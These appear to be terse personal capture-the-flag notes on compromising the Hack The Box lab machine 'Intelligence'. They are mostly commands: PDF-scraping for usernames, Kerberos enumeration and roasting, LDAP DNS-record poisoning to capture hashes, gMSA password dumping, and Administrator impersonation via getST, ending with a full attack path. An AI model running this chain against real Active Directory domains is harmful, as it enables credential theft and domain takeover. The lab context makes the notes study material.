Intelligence

https://app.hackthebox.eu/machines/Intelligence

domain - intelligence administrator http://10.10.10.248/documents/2020-12-15-upload.pdf year-mm-dd for i in range(0,len(date)): ...: b = requests.get(url+date[i]+"-upload.pdf", timeout=5) ...: if b.status_code == 200: ...: print(date[i]+":Yes") ...: a = open(date[i]+".pdf","wb") ...: a.write(b.content) ...: a.close() ...: else: ...: print(date[i]+":No") - GetNPUsers.py -dc-ip 10.10.10.248 -usersfile pdf_users intelligence/ - ./kerbrute_linux_amd64 userenum --dc 10.10.10.248 -d "intelligence" ../intelligence/pdf_users [99 users]

smbclient -U "Tiffany.Molina%[redacted]" -L 10.10.10.248

-python3 crackmapexec smb 10.10.10.248 -u Tiffany.Molina -p '[redacted]' -x whoami - spider all shares using crackmapexec [viewable at /tmp/]

python3 crackmapexec smb 10.10.10.248 -u Tiffany.Molina -p '[redacted]' -M spider_plus psexec.py <domain>/<username>:<password>@<IP> psexec.py intelligence/Tiffany.Molina:[redacted]@10.10.10.248 DC=intelligence,DC=htb CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb β€’ LDAP ldapsearch -x -h 10.10.10.248 -D "intelligence\Tiffany.Molina" -w [redacted] -b 'DC=intelligence,DC=htb' - LDIF dn: ou=People123,dc=intelligence,dc=htb objectClass: organizationalUnit ou: People123 ldapadd -x -h 10.10.10.248 -D "intelligence\Tiffany.Molina" -w [redacted] -b 'DC=intelligence,DC=htb' -f test1 - create LDAP DNS entry for responder IP python3 dnstool.py -u intelligence\\Tiffany.Molina -p [redacted] -a add -d <resp. IP> -r webtemp.intelligence.htb 10.10.10.248 - check LDAP DNS record ldapsearch -x -h 10.10.10.248 -D "intelligence\Tiffany.Molina" -w [redacted] -b 'DC=domaindnszones,DC=intelligence,DC=htb' smbclient -L 10.10.10.248 --pw-nt-hash python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb -l 10.10.10.248 getST.py -dc-ip 10.10.10.248 -impersonate Administrator -hashes :c699eaac79b69357d9dabee3379547e6 intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb smbclient.py -k intelligence.htb/Administrator@dc.intelligence.htb -no-pass --------------------------------- Path: --------------------------------- - Enumerated SMB - List of objects from LDAP - Username from creator metadata of pdf is valid windows user for domain β€œintelligence” - Bruteforce a user using kerberos - writing data through LDAP using tiffany [INSUFF_ACCESS_RIGHTS] - change defaults creds of user using LDAP? - adding a DNS record with web* - Cracking/Reusing the NTLMv2 Hash - Using the new creds to get any GASM enabled accounts - Get a kerberos ticket using that service account and impersonating the Administrator - Use the kerberos ticket to get access to SMB

PreviousMisconfigured File Upload to RCENextSeal

Last updated